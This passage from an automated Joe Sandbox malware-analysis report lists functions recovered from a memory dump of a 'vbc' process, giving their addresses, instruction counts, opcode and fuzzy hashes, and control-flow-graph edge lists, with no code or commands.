                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cea29dc77068e7ef18a37affa4aaed495097738c32ef1c51327a51e963e0ac0f
                                                                                                                                              • Instruction ID: c09e0df7f57c45eced0ec601f029064d1fba60b7873022b131312ef17d98ff2d
                                                                                                                                              • Opcode Fuzzy Hash: cea29dc77068e7ef18a37affa4aaed495097738c32ef1c51327a51e963e0ac0f
                                                                                                                                              • Instruction Fuzzy Hash: 4552FD74A02219CFDF64DF68E989B9DBBB6FB88301F104199D40AA7755DB34AD81CF80
                                                                                                                                              Function 053F76F1 Relevance: .5, Instructions: 456COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3433 53f76f1-53f7725 3434 53f772b-53f774e 3433->3434 3435 53f7b54-53f7b58 3433->3435 3444 53f77fc-53f7800 3434->3444 3445 53f7754-53f7761 3434->3445 3436 53f7b5a-53f7b6e 3435->3436 3437 53f7b71-53f7b7f 3435->3437 3442 53f7b81-53f7b96 3437->3442 3443 53f7bf0-53f7c05 3437->3443 3451 53f7b9d-53f7baa 3442->3451 3452 53f7b98-53f7b9b 3442->3452 3453 53f7c0c-53f7c19 3443->3453 3454 53f7c07-53f7c0a 3443->3454 3446 53f7848-53f7851 3444->3446 3447 53f7802-53f7810 3444->3447 3459 53f7763-53f776e 3445->3459 3460 53f7770 3445->3460 3455 53f7c67 3446->3455 3456 53f7857-53f7861 3446->3456 3447->3446 3465 53f7812-53f782d 3447->3465 3461 53f7bac-53f7bed 3451->3461 3452->3461 3462 53f7c1b-53f7c56 3453->3462 3454->3462 3466 53f7c6c-53f7c85 3455->3466 3456->3435 3457 53f7867-53f7870 3456->3457 3463 53f787f-53f788b 3457->3463 3464 53f7872-53f7877 3457->3464 3467 53f7772-53f7774 3459->3467 3460->3467 3504 53f7c5d-53f7c64 3462->3504 3463->3466 3472 53f7891-53f7897 3463->3472 3464->3463 3490 53f782f-53f7839 3465->3490 3491 53f783b 3465->3491 3467->3444 3474 53f777a-53f77dc 3467->3474 3475 53f7b3e-53f7b42 3472->3475 3476 53f789d-53f78ad 3472->3476 3517 53f77de 3474->3517 3518 53f77e2-53f77f9 3474->3518 3475->3455 3479 53f7b48-53f7b4e 3475->3479 3488 53f78af-53f78bf 3476->3488 3489 53f78c1-53f78c3 3476->3489 3479->3435 3479->3457 3492 53f78c6-53f78cc 3488->3492 3489->3492 3493 53f783d-53f783f 3490->3493 3491->3493 3492->3475 3499 53f78d2-53f78e1 3492->3499 3493->3446 3500 53f7841 3493->3500 3501 53f798f-53f79ba call 53f7538 * 2 3499->3501 3502 53f78e7 3499->3502 3500->3446 3519 53f7aa4-53f7abe 3501->3519 3520 53f79c0-53f79c4 3501->3520 3506 53f78ea-53f78fb 3502->3506 3506->3466 3507 53f7901-53f7913 3506->3507 3507->3466 3509 53f7919-53f7931 3507->3509 3573 53f7933 call 53f80c9 3509->3573 3574 53f7933 call 53f80d8 3509->3574 3513 53f7939-53f7949 3513->3475 3516 53f794f-53f7952 3513->3516 3521 53f795c-53f795f 3516->3521 3522 53f7954-53f795a 3516->3522 3517->3518 3518->3444 3519->3435 3542 53f7ac4-53f7ac8 3519->3542 3520->3475 3523 53f79ca-53f79ce 3520->3523 3521->3455 3524 53f7965-53f7968 3521->3524 3522->3521 3522->3524 3527 53f79f6-53f79fc 3523->3527 3528 53f79d0-53f79dd 3523->3528 3529 53f796a-53f796e 3524->3529 3530 53f7970-53f7973 3524->3530 3532 53f79fe-53f7a02 3527->3532 3533 53f7a37-53f7a3d 3527->3533 3545 53f79df-53f79ea 3528->3545 3546 53f79ec 3528->3546 3529->3530 3531 53f7979-53f797d 3529->3531 3530->3455 3530->3531 3531->3455 3538 53f7983-53f7989 3531->3538 3532->3533 3539 53f7a04-53f7a0d 3532->3539 3535 53f7a3f-53f7a43 3533->3535 3536 53f7a49-53f7a4f 3533->3536 3535->3504 3535->3536 3543 53f7a5b-53f7a5d 3536->3543 3544 53f7a51-53f7a55 3536->3544 3538->3501 3538->3506 3540 53f7a0f-53f7a14 3539->3540 3541 53f7a1c-53f7a32 3539->3541 3540->3541 3541->3475 3547 53f7aca-53f7ad4 call 53f63e0 3542->3547 3548 53f7b04-53f7b08 3542->3548 3549 53f7a5f-53f7a68 3543->3549 3550 53f7a92-53f7a94 3543->3550 3544->3475 3544->3543 3551 53f79ee-53f79f0 3545->3551 3546->3551 3547->3548 3561 53f7ad6-53f7aeb 3547->3561 3548->3504 3554 53f7b0e-53f7b12 3548->3554 3557 53f7a6a-53f7a6f 3549->3557 3558 53f7a77-53f7a8d 3549->3558 3550->3475 3552 53f7a9a-53f7aa1 3550->3552 3551->3475 3551->3527 3554->3504 3559 53f7b18-53f7b25 3554->3559 3557->3558 3558->3475 3564 53f7b27-53f7b32 3559->3564 3565 53f7b34 3559->3565 3561->3548 3570 53f7aed-53f7b02 3561->3570 3567 53f7b36-53f7b38 3564->3567 3565->3567 3567->3475 3567->3504 3570->3435 3570->3548 3573->3513 3574->3513
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5ab6cc1f492bc07dc2dbf0e71639af521e9d7ee498f0c84c79785596a0ac5914
                                                                                                                                              • Instruction ID: 7450b29b96a9cfc05732c947337141f6096e3a1b918eb27ec91fab4a6a8ee1bb
                                                                                                                                              • Opcode Fuzzy Hash: 5ab6cc1f492bc07dc2dbf0e71639af521e9d7ee498f0c84c79785596a0ac5914
                                                                                                                                              • Instruction Fuzzy Hash: E6125A30A002099FCB15DF69D884AAEBBF2FF89314F1485A9E94ADB361D771ED41CB50
                                                                                                                                              Function 053F5F38 Relevance: .3, Instructions: 327COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3575 53f5f38-53f5f5a 3576 53f5f5c-53f5f60 3575->3576 3577 53f5f70-53f5f7b 3575->3577 3578 53f5f88-53f5f8f 3576->3578 3579 53f5f62-53f5f6e 3576->3579 3580 53f6023-53f604f 3577->3580 3581 53f5f81-53f5f83 3577->3581 3583 53f5faf-53f5fb8 3578->3583 3584 53f5f91-53f5f98 3578->3584 3579->3577 3579->3578 3589 53f6056-53f6098 3580->3589 3582 53f601b-53f6020 3581->3582 3677 53f5fba call 53f5f2a 3583->3677 3678 53f5fba call 53f5f38 3583->3678 3584->3583 3586 53f5f9a-53f5fa5 3584->3586 3588 53f5fab-53f5fad 3586->3588 3586->3589 3587 53f5fc0-53f5fc2 3590 53f5fca-53f5fd2 3587->3590 3591 53f5fc4-53f5fc8 3587->3591 3588->3582 3607 53f60cb-53f60cf 3589->3607 3608 53f609a-53f60ae 3589->3608 3594 53f5fd4-53f5fd9 3590->3594 3595 53f5fe1-53f5fe3 3590->3595 3591->3590 3593 53f5fe5-53f6004 call 53f69a0 3591->3593 3601 53f6019 3593->3601 3602 53f6006-53f600f 3593->3602 3594->3595 3595->3582 3601->3582 3682 53f6011 call 53fafad 3602->3682 3683 53f6011 call 53faeba 3602->3683 3684 53f6011 call 53faef0 3602->3684 3604 53f6017 3604->3582 3611 53f60d5-53f60d9 3607->3611 3612 53f6163-53f6165 3607->3612 3609 53f60bd-53f60c1 3608->3609 3610 53f60b0-53f60b6 3608->3610 3609->3607 3610->3609 3613 53f60db-53f60e7 3611->3613 3614 53f60e9-53f60f6 3611->3614 3680 53f6167 call 53f6300 3612->3680 3681 53f6167 call 53f62f0 3612->3681 3620 53f60f8-53f6102 3613->3620 3614->3620 3615 53f616d-53f6173 3616 53f617f-53f6186 3615->3616 3617 53f6175-53f617b 3615->3617 3621 53f617d 3617->3621 3622 53f61e1-53f6240 3617->3622 3625 53f612f-53f6133 3620->3625 3626 53f6104-53f6113 3620->3626 3621->3616 3635 53f6247-53f626b 3622->3635 3627 53f613f-53f6143 3625->3627 3628 53f6135-53f613b 3625->3628 3637 53f6115-53f611c 3626->3637 3638 53f6123-53f612d 3626->3638 3627->3616 3633 53f6145-53f6149 3627->3633 3631 53f613d 3628->3631 3632 53f6189-53f61da 3628->3632 3631->3616 3632->3622 3634 53f614f-53f6161 3633->3634 3633->3635 3634->3616 3644 53f626d-53f626f 3635->3644 3645 53f6271-53f6273 3635->3645 3637->3638 3638->3625 3647 53f62e9-53f62ec 3644->3647 3648 53f6275-53f6279 3645->3648 3649 53f6284-53f6286 3645->3649 3653 53f627f-53f6282 3648->3653 3654 53f627b-53f627d 3648->3654 3655 53f6299-53f629f 3649->3655 3656 53f6288-53f628c 3649->3656 3653->3647 3654->3647 3660 53f62ca-53f62cc 3655->3660 3661 53f62a1-53f62c8 3655->3661 3657 53f628e-53f6290 3656->3657 3658 53f6292-53f6297 3656->3658 3657->3647 3658->3647 3663 53f62d3-53f62d5 3660->3663 3661->3663 3667 53f62db-53f62dd 3663->3667 3668 53f62d7-53f62d9 3663->3668 3669 53f62df-53f62e4 3667->3669 3670 53f62e6 3667->3670 3668->3647 3669->3647 3670->3647 3677->3587 3678->3587 3680->3615 3681->3615 3682->3604 3683->3604 3684->3604
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 75180d4f31265f7cb5dc2205ee6e2069d938cd6e1a390416d183e909be86cb75
                                                                                                                                              • Instruction ID: fa71c08f79ed778c68555da4190c6e50a078eb4707001af94b88a259e3900668
                                                                                                                                              • Opcode Fuzzy Hash: 75180d4f31265f7cb5dc2205ee6e2069d938cd6e1a390416d183e909be86cb75
                                                                                                                                              • Instruction Fuzzy Hash: 50B1DB707082019FDB159F74D859B7E7BA6BF89300F14856AEA06CB392CB79CC42D7A0
                                                                                                                                              Function 053F9A10 Relevance: .2, Instructions: 242COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3830 53f9a10-53f9a31 3831 53f9adb 3830->3831 3832 53f9a37-53f9a3a 3830->3832 3834 53f9ae0-53f9b19 3831->3834 3832->3831 3833 53f9a40-53f9a58 3832->3833 3833->3831 3842 53f9a5e-53f9a62 3833->3842 3837 53f9b1b-53f9b21 3834->3837 3838 53f9b56 3834->3838 3840 53f9b24-53f9b26 3837->3840 3841 53f9b58-53f9b5f 3838->3841 3843 53f9b28-53f9b31 3840->3843 3844 53f9b65-53f9b99 3840->3844 3845 53f9a86-53f9a8c 3842->3845 3846 53f9a64 3842->3846 3849 53f9b45-53f9b4f 3843->3849 3850 53f9b33-53f9b43 3843->3850 3858 53f9b9b-53f9ba1 3844->3858 3859 53f9bf9-53f9c06 3844->3859 3845->3831 3848 53f9a8e-53f9a90 3845->3848 3847 53f9a67-53f9a6a 3846->3847 3847->3834 3851 53f9a6c-53f9a78 3847->3851 3853 53f9ab4-53f9abb 3848->3853 3854 53f9a92 3848->3854 3855 53f9b51-53f9b54 3849->3855 3856 53f9b60 3849->3856 3850->3841 3851->3831 3857 53f9a7a-53f9a80 3851->3857 3853->3834 3862 53f9abd-53f9ac6 3853->3862 3860 53f9a95-53f9a98 3854->3860 3855->3838 3855->3840 3856->3844 3857->3831 3863 53f9a82-53f9a84 3857->3863 3864 53f9c17-53f9c53 call 53f9d59 3858->3864 3865 53f9ba3-53f9baf 3858->3865 3868 53f9c08-53f9c0f 3859->3868 3860->3834 3866 53f9a9a-53f9aa6 3860->3866 3862->3831 3867 53f9ac8-53f9ad1 3862->3867 3863->3845 3863->3847 3880 53f9c59-53f9c60 3864->3880 3869 53f9be8-53f9bf2 3865->3869 3870 53f9bb1-53f9bbb 3865->3870 3866->3831 3871 53f9aa8-53f9aae 3866->3871 3867->3831 3872 53f9ad3-53f9ada 3867->3872 3876 53f9bf4-53f9bf7 3869->3876 3877 53f9c12 3869->3877 3870->3869 3874 53f9bbd-53f9be6 3870->3874 3871->3831 3875 53f9ab0-53f9ab2 3871->3875 3874->3868 3875->3853 3875->3860 3876->3858 3876->3859 3877->3864 3882 53f9c6c-53f9c8c 3880->3882 3883 53f9c62-53f9c67 3880->3883 3886 53f9c8e-53f9c90 3882->3886 3887 53f9cc7-53f9cc9 3882->3887 3884 53f9d35-53f9d3c 3883->3884 3888 53f9c9f-53f9ca6 3886->3888 3889 53f9c92-53f9c97 3886->3889 3890 53f9ccb-53f9cd1 3887->3890 3891 53f9d30 3887->3891 3892 53f9d3f-53f9d54 3888->3892 3893 53f9cac-53f9cc5 3888->3893 3889->3888 3890->3891 3894 53f9cd3-53f9cee 3890->3894 3891->3884 3893->3884 3898 53f9d25-53f9d27 3894->3898 3899 53f9cf0-53f9cf2 3894->3899 3898->3891 3900 53f9d29-53f9d2e 3898->3900 3901 53f9cf4-53f9cf9 3899->3901 3902 53f9d01-53f9d08 3899->3902 3900->3884 3901->3902 3902->3892 3903 53f9d0a-53f9d23 3902->3903 3903->3884
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2d085f0b5ba2cb00c8f75c5c2ed565875f0c0dfc68bc7c6f72ad473f9ac065df
                                                                                                                                              • Instruction ID: f5d5d9e7869d224ae3cc129b5b7b692818a5d0e5150ecee70680f0b7592f0a6a
                                                                                                                                              • Opcode Fuzzy Hash: 2d085f0b5ba2cb00c8f75c5c2ed565875f0c0dfc68bc7c6f72ad473f9ac065df
                                                                                                                                              • Instruction Fuzzy Hash: DB913732A046459FCB11CF28C884BAABBB6FF85320B15C6A7D958D7351C731EC52CBA1
                                                                                                                                              Function 053F6498 Relevance: .2, Instructions: 232COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 3906 53f6498-53f64a5 3907 53f64ad-53f64af 3906->3907 3908 53f64a7-53f64ab 3906->3908 3910 53f66c0-53f66c7 3907->3910 3908->3907 3909 53f64b4-53f64bf 3908->3909 3911 53f66c8 3909->3911 3912 53f64c5-53f64cc 3909->3912 3915 53f66cd-53f66e0 3911->3915 3913 53f64d2-53f64e1 3912->3913 3914 53f6661-53f6667 3912->3914 3913->3915 3916 53f64e7-53f64f6 3913->3916 3917 53f666d-53f6671 3914->3917 3918 53f6669-53f666b 3914->3918 3927 53f6718-53f671a 3915->3927 3928 53f66e2-53f6705 3915->3928 3924 53f650b-53f650e 3916->3924 3925 53f64f8-53f64fb 3916->3925 3919 53f66be 3917->3919 3920 53f6673-53f6679 3917->3920 3918->3910 3919->3910 3920->3911 3922 53f667b-53f667e 3920->3922 3922->3911 3926 53f6680-53f6695 3922->3926 3932 53f651a-53f6520 3924->3932 3933 53f6510-53f6513 3924->3933 3931 53f64fd-53f6500 3925->3931 3925->3932 3952 53f66b9-53f66bc 3926->3952 3953 53f6697-53f669d 3926->3953 3929 53f672f-53f6736 3927->3929 3930 53f671c-53f672e 3927->3930 3942 53f670e-53f6712 3928->3942 3943 53f6707-53f670c 3928->3943 3936 53f6506 3931->3936 3937 53f6601-53f6607 3931->3937 3934 53f6538-53f6555 3932->3934 3935 53f6522-53f6528 3932->3935 3938 53f6566-53f656c 3933->3938 3939 53f6515 3933->3939 3980 53f655e-53f6561 3934->3980 3944 53f652c-53f6536 3935->3944 3945 53f652a 3935->3945 3949 53f662c-53f6639 3936->3949 3947 53f661f-53f6629 3937->3947 3948 53f6609-53f660f 3937->3948 3950 53f656e-53f6574 3938->3950 3951 53f6584-53f6596 3938->3951 3939->3949 3942->3927 3943->3927 3944->3934 3945->3934 3947->3949 3957 53f6613-53f661d 3948->3957 3958 53f6611 3948->3958 3967 53f664d-53f664f 3949->3967 3968 53f663b-53f663f 3949->3968 3959 53f6578-53f6582 3950->3959 3960 53f6576 3950->3960 3969 53f6598-53f65a4 3951->3969 3970 53f65a6-53f65c9 3951->3970 3952->3910 3954 53f66af-53f66b2 3953->3954 3955 53f669f-53f66ad 3953->3955 3954->3911 3963 53f66b4-53f66b7 3954->3963 3955->3911 3955->3954 3957->3947 3958->3947 3959->3951 3960->3951 3963->3952 3963->3953 3975 53f6653-53f6656 3967->3975 3968->3967 3974 53f6641-53f6645 3968->3974 3981 53f65f1-53f65ff 3969->3981 3970->3911 3984 53f65cf-53f65d2 3970->3984 3974->3911 3976 53f664b 3974->3976 3975->3911 3977 53f6658-53f665b 3975->3977 3976->3975 3977->3913 3977->3914 3980->3949 3981->3949 3984->3911 3985 53f65d8-53f65ea 3984->3985 3985->3981
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a5b93a371b274a0dce3045a8871450c1f0e92df39d5e7204fffcb2f1d1f30a67
                                                                                                                                              • Instruction ID: c305092a3d3cbedd488f89bb24ac7d1ee4df29f6a9c67acc8eabe546b1ebdd34
                                                                                                                                              • Opcode Fuzzy Hash: a5b93a371b274a0dce3045a8871450c1f0e92df39d5e7204fffcb2f1d1f30a67
                                                                                                                                              • Instruction Fuzzy Hash: 3D81E230B04505CFCB18DF69C88AA69BBF6FF89700B14816AD606EB765DB71EC41CB90
                                                                                                                                              Function 053F80D8 Relevance: .2, Instructions: 201COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2cdbbe37c624975f1e03e90ad5ea5ad228797effab1f030804a6bfe8061c04b6
                                                                                                                                              • Instruction ID: 15259801fd9ccad5f8749a71b6f0b53ce73decd0de01fe2810611d29ad816ffd
                                                                                                                                              • Opcode Fuzzy Hash: 2cdbbe37c624975f1e03e90ad5ea5ad228797effab1f030804a6bfe8061c04b6
                                                                                                                                              • Instruction Fuzzy Hash: 6E715C357046059FCB18DF68C888A7EBBE6BF49304B1500A9EA06DB371DBB5EC41CB50
                                                                                                                                              Function 053FF71F Relevance: .2, Instructions: 154COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 66203e54ae1f1f8baadd710acf76c7db2237ad69ddec79b1f1cd41d8c462294d
                                                                                                                                              • Instruction ID: aa13cc19e034fb7b6ed2d6d4b9567688c6c7440720f234186449283fc0c39a84
                                                                                                                                              • Opcode Fuzzy Hash: 66203e54ae1f1f8baadd710acf76c7db2237ad69ddec79b1f1cd41d8c462294d
                                                                                                                                              • Instruction Fuzzy Hash: D5610E30D01319DFDB14DFA5D854AAEBBB2FF88300F608529D80AAB395DB355A45CF40
                                                                                                                                              Function 053FD548 Relevance: .1, Instructions: 138COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 08edcfc109935287c85f5535adf3f439f013e35f2e9f0627f2cd22ff7a8052d6
                                                                                                                                              • Instruction ID: 91383cdace99478225a8d15d80b15da1616959e771476e87af95925c3d63528c
                                                                                                                                              • Opcode Fuzzy Hash: 08edcfc109935287c85f5535adf3f439f013e35f2e9f0627f2cd22ff7a8052d6
                                                                                                                                              • Instruction Fuzzy Hash: 06518274E01208DFDB48DFA9D59499DBBF2BF89300F248569E809AB364DB319805CF10
                                                                                                                                              Function 053FAEBA Relevance: .1, Instructions: 135COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 20d742f13b2d2cb41984e40d70b117a03e34b9bea6593d5f70f18f7b6d5fe1b9
                                                                                                                                              • Instruction ID: a8795347f39ecc7b85a9247e55627ac963b154e7ca192af9371df2a018174200
                                                                                                                                              • Opcode Fuzzy Hash: 20d742f13b2d2cb41984e40d70b117a03e34b9bea6593d5f70f18f7b6d5fe1b9
                                                                                                                                              • Instruction Fuzzy Hash: CF41E6717042019FC709AB74E828A6EBBB7AFC9700B14446AE61ACB791DF359D05C7A1
                                                                                                                                              Function 053F41A0 Relevance: .1, Instructions: 134COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e970c82181cc2087c3394ea1df0a842aae10bd07a452d4525d9a65877795c4bf
                                                                                                                                              • Instruction ID: 83ef375d5bcea7f6dbd4ff4df9283f7269e97cea5d092f52e152eebb35be9f4d
                                                                                                                                              • Opcode Fuzzy Hash: e970c82181cc2087c3394ea1df0a842aae10bd07a452d4525d9a65877795c4bf
                                                                                                                                              • Instruction Fuzzy Hash: 5D519374E01208DFDB18DFA9D59499EBBF6FF89300F209069E815AB365DB31A942CF50
                                                                                                                                              Function 053FA303 Relevance: .1, Instructions: 125COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 82bca5534d7fc4ab5a1041dfab8d82186a57c4ca83f8442d68e334f8a17eff74
                                                                                                                                              • Instruction ID: 6c5f031a0320f304ba68f3ae5c6eaadd5bc42ce228e6ff6fb94766ef586199b7
                                                                                                                                              • Opcode Fuzzy Hash: 82bca5534d7fc4ab5a1041dfab8d82186a57c4ca83f8442d68e334f8a17eff74
                                                                                                                                              • Instruction Fuzzy Hash: EA418231A04249DFCF11CFA4D848AEDBFB2BF49350F048156EA19AB791D375E964CB60
                                                                                                                                              Function 053F3CB1 Relevance: .1, Instructions: 118COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8a3e43fd930ebc50e1919d2fbdc02a88e48ed4aaff0576df72e4213d7cdf43d2
                                                                                                                                              • Instruction ID: f181f9d389460404bf2c0405d91db7d916acb90026275dc625b01adb482c1d6b
                                                                                                                                              • Opcode Fuzzy Hash: 8a3e43fd930ebc50e1919d2fbdc02a88e48ed4aaff0576df72e4213d7cdf43d2
                                                                                                                                              • Instruction Fuzzy Hash: 6B31C4317093648BEF1D567558A427AAAABBFC4610F18483AEA03D7380DFB9C84597A1
                                                                                                                                              Function 053F9C30 Relevance: .1, Instructions: 107COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5778bac3fd65c42d0fe313d057f764c1fcf841887b1476588956fc6c75449b26
                                                                                                                                              • Instruction ID: ae30766f22f69d9063458478b10d7fb1adffa0fb26f5ccf43144fba6e1ee9dd6
                                                                                                                                              • Opcode Fuzzy Hash: 5778bac3fd65c42d0fe313d057f764c1fcf841887b1476588956fc6c75449b26
                                                                                                                                              • Instruction Fuzzy Hash: 11415E317042458FDB01DF68C884B7A7BA6FF89314F5484A6EA08CB296D775DC41CB61
                                                                                                                                              Function 053F8EF8 Relevance: .1, Instructions: 104COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4e88f9fc26e74bc32e18d3d6ccded9853a8c709c0a7241f4183783f7d9c429da
                                                                                                                                              • Instruction ID: feec645589674ae7eaad0503c2f73c189b3c461202a81de72085645521c19952
                                                                                                                                              • Opcode Fuzzy Hash: 4e88f9fc26e74bc32e18d3d6ccded9853a8c709c0a7241f4183783f7d9c429da
                                                                                                                                              • Instruction Fuzzy Hash: 0431C2203083519FC72D8B38E854A3EBB6BFF85600B14059AE142CB693DB68CC8087A1
                                                                                                                                              Function 053F5658 Relevance: .1, Instructions: 101COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.4055886380.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_53f0000_vbc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1fb108b6461bc27d4c0fd4c60c9ab27e6d0eceeaf13c4930b8af4103cc8541f8
                                                                                                                                              • Instruction ID: 2dd322d85ccd3d76ebf35a253bee337a7e580616b3c0524a0357b420434982f3
                                                                                                                                              • Opcode Fuzzy Hash: 1fb108b6461bc27d4c0fd4c60c9ab27e6d0eceeaf13c4930b8af4103cc8541f8
                                                                                                                                              • Instruction Fuzzy Hash: 0231B3B1305249EFCF45AFA4D858A7E3BA6FB88310F004428FA1587785DB7AC925DB90
                                                                                                                                              Function 053F8380 Relevance: .1, Instructions: 87COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
